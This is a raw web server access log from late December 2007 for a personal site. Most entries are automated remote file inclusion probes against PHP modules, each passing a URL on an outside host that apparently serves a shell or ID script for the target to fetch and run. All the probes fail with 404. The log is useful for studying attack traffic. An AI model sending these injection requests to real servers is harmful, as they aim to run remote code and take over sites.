68.149.224.227 - - [27/Dec/2007:05:56:21 -0800] "GET /logs/modifyform.html?code=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.10 - - [27/Dec/2007:05:57:13 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://pawang.in/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.10 - - [27/Dec/2007:05:57:13 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://pawang.in/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.10 - - [27/Dec/2007:05:57:13 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://pawang.in/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.136 - - [27/Dec/2007:05:57:50 -0800] "GET /bikes/dteel/10MAR07/?S=A HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:05:58:09 -0800] "GET /?N=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.26.63.10 - - [27/Dec/2007:06:00:13 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usil.us/s/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.10 - - [27/Dec/2007:06:00:13 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usil.us/s/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.10 - - [27/Dec/2007:06:00:14 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usil.us/s/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:06:07:11 -0800] "GET /funny/?D=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.41.174.211 - - [27/Dec/2007:06:12:15 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://bestnews.altervista.org/secure_scan_id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
69.41.174.211 - - [27/Dec/2007:06:12:25 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://bestnews.altervista.org/secure_scan_id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.241.213.160 - - [27/Dec/2007:06:18:57 -0800] "GET /logs/access_071216.log//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.160 - - [27/Dec/2007:06:18:57 -0800] "GET //skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.160 - - [27/Dec/2007:06:18:58 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:06:21:38 -0800] "GET /logs/access_071214.log/modifyform.html?code=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.76.110.169 - - [27/Dec/2007:06:21:56 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
208.76.110.169 - - [27/Dec/2007:06:21:56 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.6.24.150 - - [27/Dec/2007:06:22:52 -0800] "GET /tmp/?M=D HTTP/1.0" 200 2167 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.180.152.15 - - [27/Dec/2007:06:24:16 -0800] "GET /bikes/dteel/140CANON/IMG_4100s.JPG HTTP/1.1" 200 222671 "http://www.st-owners.com/forums/showthread.php?t=31962" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
74.6.19.148 - - [27/Dec/2007:06:24:43 -0800] "GET /plans/?M=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.241.213.160 - - [27/Dec/2007:06:26:31 -0800] "GET /logs/access_071212.log//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.94.144.249 - - [27/Dec/2007:06:34:51 -0800] "GET //skin/zero_vote/error.php?dir=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.196.150.6 - - [27/Dec/2007:06:39:48 -0800] "GET /skin/zero_vote/error.php?dir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.196.150.6 - - [27/Dec/2007:06:39:48 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.153.194.3 - - [27/Dec/2007:06:39:55 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.153.194.3 - - [27/Dec/2007:06:39:55 -0800] "GET /skin/zero_vote/error.php?dir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.34.106 - - [27/Dec/2007:06:40:05 -0800] "GET /skin/zero_vote/error.php?dir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.106 - - [27/Dec/2007:06:40:06 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.106 - - [27/Dec/2007:06:40:08 -0800] "GET /skin/zero_vote/error.php?dir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.243.64.123 - - [27/Dec/2007:06:41:06 -0800] "GET /skin/zero_vote/error.php?dir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.243.64.123 - - [27/Dec/2007:06:41:08 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.221.184.180 - - [27/Dec/2007:06:42:50 -0800] "GET /skin/zero_vote/error.php?dir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.180 - - [27/Dec/2007:06:42:50 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.48.192.42 - - [27/Dec/2007:06:44:01 -0800] "GET /coppercop/theme.php?THEME_DIR=http://shop.ilyichevsk.net/administrator/components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
38.113.162.193 - - [27/Dec/2007:06:45:13 -0800] "GET /skin/zero_vote/error.php?dir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
143.248.135.48 - - [27/Dec/2007:06:45:54 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
143.248.135.48 - - [27/Dec/2007:06:45:57 -0800] "GET /skin/zero_vote/error.php?dir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
38.102.88.179 - - [27/Dec/2007:06:47:52 -0800] "GET /skin/zero_vote/error.php?dir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.73.141.10 - - [27/Dec/2007:06:48:12 -0800] "GET /skin/zero_vote/error.php?dir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.73.141.10 - - [27/Dec/2007:06:48:13 -0800] "GET /skin/zero_vote/error.php?dir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.177.75.24 - - [27/Dec/2007:06:48:47 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.177.75.24 - - [27/Dec/2007:06:48:47 -0800] "GET /skin/zero_vote/error.php?dir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.128.49 - - [27/Dec/2007:06:50:20 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.strictly-tango.dk/css/pictures/Logo-banner-2%20copy.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.63.50 - - [27/Dec/2007:06:50:34 -0800] "GET /logs/access_071216.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.63.50 - - [27/Dec/2007:06:50:34 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.63.50 - - [27/Dec/2007:06:50:34 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.63.50 - - [27/Dec/2007:06:50:52 -0800] "GET /logs/access_071212.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.128.49 - - [27/Dec/2007:06:52:56 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.strictly-tango.dk/css/pictures/Logo-banner-2%20copy.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [27/Dec/2007:06:52:56 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.strictly-tango.dk/css/pictures/Logo-banner-2%20copy.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.229.90 - - [27/Dec/2007:06:52:59 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:06:53:02 -0800] "GET /logs/access_071216.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:06:53:02 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:06:53:02 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:06:53:10 -0800] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [27/Dec/2007:06:53:16 -0800] "GET /logs/access_071216.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoliquid.com/zen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [27/Dec/2007:06:53:16 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoliquid.com/zen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [27/Dec/2007:06:53:16 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoliquid.com/zen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.82.99.126 - - [27/Dec/2007:06:53:22 -0800] "GET /index.php?pagina=http://ipessa.freehyperspace2.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
195.82.99.126 - - [27/Dec/2007:06:53:22 -0800] "GET /logs/index.php?pagina=http://ipessa.freehyperspace2.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
208.186.169.183 - - [27/Dec/2007:06:53:28 -0800] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoliquid.com/zen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.19.178 - - [27/Dec/2007:06:53:54 -0800] "GET /index.php?mosConfig_absolute_path=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:06:54:10 -0800] "GET /logs/access_071216.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:06:54:10 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:06:54:10 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [27/Dec/2007:06:54:13 -0800] "GET /logs/access_071216.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoliquid.com/zen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [27/Dec/2007:06:54:13 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoliquid.com/zen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [27/Dec/2007:06:54:13 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoliquid.com/zen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:06:54:37 -0800] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [27/Dec/2007:06:54:46 -0800] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.infoliquid.com/zen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.82.99.126 - - [27/Dec/2007:06:55:02 -0800] "GET /index.php?conteudohttp://ipessa.freehyperspace2.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.208.10.22 - - [27/Dec/2007:06:55:50 -0800] "GET /logs/index.php?conteudohttp://ipessa.freehyperspace2.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.208.10.22 - - [27/Dec/2007:06:55:50 -0800] "GET /index.php?conteudohttp://ipessa.freehyperspace2.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.215.34 - - [27/Dec/2007:06:56:07 -0800] "GET /skin/zero_vote/error.php?dir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.65.100.5 - - [27/Dec/2007:06:56:25 -0800] "GET /logs/access_071212.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.65.100.5 - - [27/Dec/2007:06:56:26 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.65.100.5 - - [27/Dec/2007:06:56:26 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.82.99.126 - - [27/Dec/2007:06:56:43 -0800] "GET //modules/xfsection/modify.php?dir_module=http://ipessa.freehyperspace2.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
195.82.99.126 - - [27/Dec/2007:06:56:44 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://ipessa.freehyperspace2.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
217.65.100.5 - - [27/Dec/2007:06:58:47 -0800] "GET /logs/access_071214.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.38.135.73 - - [27/Dec/2007:07:04:02 -0800] "GET /index.php?option=http://mobee.ru/usr/xml/c??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
219.94.144.249 - - [27/Dec/2007:07:10:48 -0800] "GET /logs/access_071216.log//skin/zero_vote/error.php?dir=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.144.249 - - [27/Dec/2007:07:10:48 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:07:10:52 -0800] "GET /funny/?S=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
121.254.168.12 - - [27/Dec/2007:07:12:07 -0800] "GET /index.php?conteudohttp://ipessa.freehyperspace2.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
121.254.168.12 - - [27/Dec/2007:07:12:21 -0800] "GET /logs/index.php?conteudohttp://ipessa.freehyperspace2.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
219.94.144.249 - - [27/Dec/2007:07:23:07 -0800] "GET /logs/access_071212.log//skin/zero_vote/error.php?dir=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.153.128.112 - - [27/Dec/2007:07:25:45 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.uem-pmd.info/images/banners/_logs/..logs/hajar1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:07:26:23 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.209.207 - - [27/Dec/2007:07:29:26 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [27/Dec/2007:07:29:26 -0800] "GET /presto/?S=D HTTP/1.0" 200 510 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:07:31:04 -0800] "GET /funny/?N=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.35 - - [27/Dec/2007:07:35:06 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.21 - - [27/Dec/2007:07:35:06 -0800] "GET /bikes/CreSTOC07/?D=D HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.140.23.21 - - [27/Dec/2007:07:35:17 -0800] "GET /logs/access_071208.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.23.21 - - [27/Dec/2007:07:35:18 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.23.21 - - [27/Dec/2007:07:35:18 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
161.58.198.111 - - [27/Dec/2007:07:35:45 -0800] "GET /logs/access_071215.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.38.135.73 - - [27/Dec/2007:07:37:25 -0800] "GET /logs/access_071214.log/index.php?option=http://mobee.ru/usr/xml/c??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.38.135.73 - - [27/Dec/2007:07:37:26 -0800] "GET /logs/index.php?option=http://mobee.ru/usr/xml/c??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.140.23.21 - - [27/Dec/2007:07:37:36 -0800] "GET /logs/access_071212.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.249.70.241 - - [27/Dec/2007:07:37:58 -0800] "GET /megumi/earrings/9_Venetian_Olive_15.JPG HTTP/1.1" 200 2346379 "-" "Googlebot-Image/1.0" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:07:41:15 -0800] "GET /bikes/?S=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:07:41:26 -0800] "GET /funny/?D=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.36.115.44 - - [27/Dec/2007:07:46:17 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
72.36.115.44 - - [27/Dec/2007:07:46:17 -0800] "GET /tmp/sess_a5c610c978917f6112e2c62b696dad34 HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
66.232.98.142 - - [27/Dec/2007:07:48:54 -0800] "GET /logs/access_071214.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.98.142 - - [27/Dec/2007:07:48:54 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.98.142 - - [27/Dec/2007:07:48:55 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.98.142 - - [27/Dec/2007:07:49:10 -0800] "GET /logs/access_071214.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.98.142 - - [27/Dec/2007:07:49:10 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.98.142 - - [27/Dec/2007:07:49:10 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.221 - - [27/Dec/2007:07:55:29 -0800] "GET /logs/access_071211.log HTTP/1.0" 200 128565 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
